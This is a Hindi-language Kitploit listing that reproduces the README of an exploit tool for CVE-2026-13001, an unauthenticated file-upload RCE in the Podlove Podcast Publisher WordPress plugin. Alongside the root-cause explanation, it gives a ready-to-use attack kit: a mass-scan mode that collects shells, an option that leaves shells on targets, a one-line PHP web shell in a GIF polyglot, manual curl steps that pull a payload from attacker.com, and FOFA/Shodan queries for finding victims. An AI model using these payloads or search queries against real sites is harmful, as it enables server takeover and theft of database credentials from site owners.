Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-13001 — Podlove Podcast Publisher: is_image() बनाम extract_file_extension() बेमेल के माध्यम से बिना प्रमाणीकरण के फ़ाइल अपलोड RCE | CVSS 9.8 | Kitploit
उपकरण/GitHubGitHub/shinthink/cve-2026-13001
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षापेलोड डेवलपमेंट
GitHubshinthink/cve-2026-13001

CVE-2026-13001

Podlove Podcast Publisher: is_image() बनाम extract_file_extension() बेमेल के माध्यम से बिना प्रमाणीकरण के फ़ाइल अपलोड RCE | CVSS 9.8

रिपॉजिटरी देखें
211 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-13001 — Podlove Podcast Publisher अनप्रमाणित फ़ाइल अपलोड RCE

is_image() बनाम extract_file_extension() बेमेल → PHP पॉलीग्लॉट अपलोड


अवलोकन

CVE-2026-13001 Podlove Podcast Publisher WordPress प्लगइन संस्करण ≤ 4.5.1 में एक गंभीर-स्तर (CVSS 9.8) अनप्रमाणित मनमाना फ़ाइल अपलोड भेद्यता है।

यह भेद्यता दो आंतरिक फ़ंक्शनों के बीच बेमेल का फायदा उठाती है जो फ़ाइल एक्सटेंशन को अलग-अलग तरीके से पार्स करते हैं:

  • is_image() का उपयोग करता है जिसमें → URL को के रूप में दिखाता है ✅ (मान्य छवि)
basename()
क्वेरी स्ट्रिंग शामिल होती है
shell.php?.gif
.gif
  • extract_file_extension() केवल parse_url() पथ का उपयोग करता है → .php लौटाता है → फ़ाइल .php एक्सटेंशन के साथ सहेजी जाती है 🚨
  • हमलावर GIF89a PHP पॉलीग्लॉट अपलोड करते हैं (मान्य GIF हेडर + एम्बेडेड PHP) जो छवि सत्यापन पास करते हैं लेकिन एक्सेस करने पर PHP के रूप में निष्पादित होते हैं।

    प्रभावित संस्करण

    संस्करणस्थिति
    ≤ 4.5.1असुरक्षित
    4.5.2+पैच किया गया

    खोजकर्ता: Wordfence के माध्यम से Talal Nasraddeen (14 जुलाई, 2026)


    भेद्यता तंत्र

    मूल कारण

    root@kitploit:~
    // is_image() — uses basename() which includes query string
    function is_image($url) {
        $ext = strtolower(pathinfo(basename($url), PATHINFO_EXTENSION));
        return in_array($ext, ['jpg','jpeg','png','gif','webp']);
    }
    // URL: https://attacker.com/shell.php?.gif
    // basename() → "shell.php?.gif" → ext = "gif" ✅ BYPASSED
    
    root@kitploit:~
    // extract_file_extension() — uses parse_url() path only
    function extract_file_extension($url) {
        $path = parse_url($url, PHP_URL_PATH);
        return pathinfo($path, PATHINFO_EXTENSION);
    }
    // URL: https://attacker.com/shell.php?.gif
    // parse_url() → "/shell.php" → ext = "php" 🚨 SAVED AS .php
    

    हमला प्रवाह

    root@kitploit:~
    1. Attacker hosts GIF89a PHP polyglot at attacker.com/shell.php?.gif
    2. GET /?podlove_image_cache_url={hex(url)}&podlove_file_name=test
    3. is_image() validates .gif extension → PASS
    4. Plugin downloads file → saves as test_original.php in cache/
    5. Attacker accesses /wp-content/cache/podlove/{hash}/test_original.php
    6. PHP executes → RCE
    

    स्थापना

    root@kitploit:~
    git clone https://github.com/shinthink/CVE-2026-13001.git
    cd CVE-2026-13001
    pip install -r requirements.txt
    

    उपयोग

    root@kitploit:~
    # Single target
    python cve_2026_13001.py -t target.com
    
    # Mass scan
    python cve_2026_13001.py -f targets.txt -o shells.txt
    
    # Custom payload URL
    python cve_2026_13001.py -t target.com --payload-url https://yourserver/shell.php?.gif
    
    # Debug mode, leave shells
    python cve_2026_13001.py -t target.com --debug --no-cleanup
    

    तर्क

    root@kitploit:~
      -t, --target       Single target (domain or IP)
      -f, --file         Target list, one per line
      -o, --output       Save RCE URLs to file
      --payload-url      URL hosting the PHP polyglot (default: GitHub raw)
      --threads          Concurrent workers (default: 30)
      --no-cleanup       Leave shells on target
      --debug            Show every HTTP request
      -v, --verbose      Verbose output
    

    प्रूफ ऑफ कॉन्सेप्ट

    एकल लक्ष्य

    root@kitploit:~
    $ python cve_2026_13001.py -t podcast-site.com
    
    root@kitploit:~
      Podlove Podcast Publisher | CVE-2026-13001 | CVSS 9.8
    
      Host       : podcast-site.com
      Podlove    : YES v4.5.1
      Upload     : YES
      RCE        : YES
      Shell      : https://podcast-site.com/wp-content/cache/podlove/a1/b2.../think_xxx_original.php?t=TOKEN
      Output     : uid=33(www-data) gid=33(www-data)
      Time       : 4.2s
    

    बड़े पैमाने पर स्कैन

    root@kitploit:~
      Targets: 500  |  Threads: 30
      Payload URL: https://raw.githubusercontent.com/shinthink/payloads/main/shell.gif
    
      [RCE] podcast-vuln-01.com       https://podcast-vuln-01.com/wp-content/cache/podlove/...
      [150/500] 30% | Det:42 RCE:8
    

    मैन्युअल शोषण

    चरण 1 — पॉलीग्लॉट शेल होस्ट करें

    root@kitploit:~
    // shell.php — save and host on your server
    GIF89a<?php system($_GET['c']); ?>
    

    चरण 2 — बायपास के साथ URL को हेक्स-एन्कोड करें

    root@kitploit:~
    # URL: https://attacker.com/shell.php?.gif
    echo -n "https://attacker.com/shell.php?.gif" | xxd -p | tr -d '\n'
    

    चरण 3 — कैश डाउनलोड ट्रिगर करें

    root@kitploit:~
    curl 'https://target.com/?podlove_image_cache_url=68747470733a2f2f...&podlove_file_name=shell&podlove_width=100&podlove_height=100&podlove_crop=0'
    

    चरण 4 — शेल तक पहुँचें

    root@kitploit:~
    # Path: wp-content/cache/podlove/{h[:2]}/{h[2:]}/{name}_original.php
    curl 'https://target.com/wp-content/cache/podlove/a1/b2c3.../shell_original.php?c=id'
    

    FOFA / Shodan

    root@kitploit:~
    FOFA:   body="podlove-podcasting-plugin-for-wordpress"
    Shodan: http.html:"podlove"
    

    प्रभाव

    सफल शोषण से वेब सर्वर उपयोगकर्ता के रूप में रिमोट कोड निष्पादन प्राप्त होता है:

    • wp-config.php निकालें → डेटाबेस क्रेडेंशियल
    • सभी WordPress सामग्री, उपयोगकर्ताओं और प्लगइन डेटा तक पहुँच प्राप्त करें
    • स्थायी बैकडोर तैनात करें
    • आंतरिक नेटवर्क तक पहुँच बनाएं

    अस्वीकरण

    केवल शैक्षिक और अधिकृत परीक्षण प्रयोजनों के लिए।

    लेखक दुरुपयोग के लिए कोई जिम्मेदारी नहीं लेते हैं।


    संदर्भ

    संसाधनलिंक
    Wordfence परामर्शwordfence.com
    Podlove सुरक्षा रिलीज़podlove.org
    NVD प्रविष्टिCVE-2026-13001
    Raimu0x19 द्वारा PoCGitHub
    शोधकर्ताTalal Nasraddeen

    Podlove से संबद्ध नहीं।

    टूल डाउनलोड करें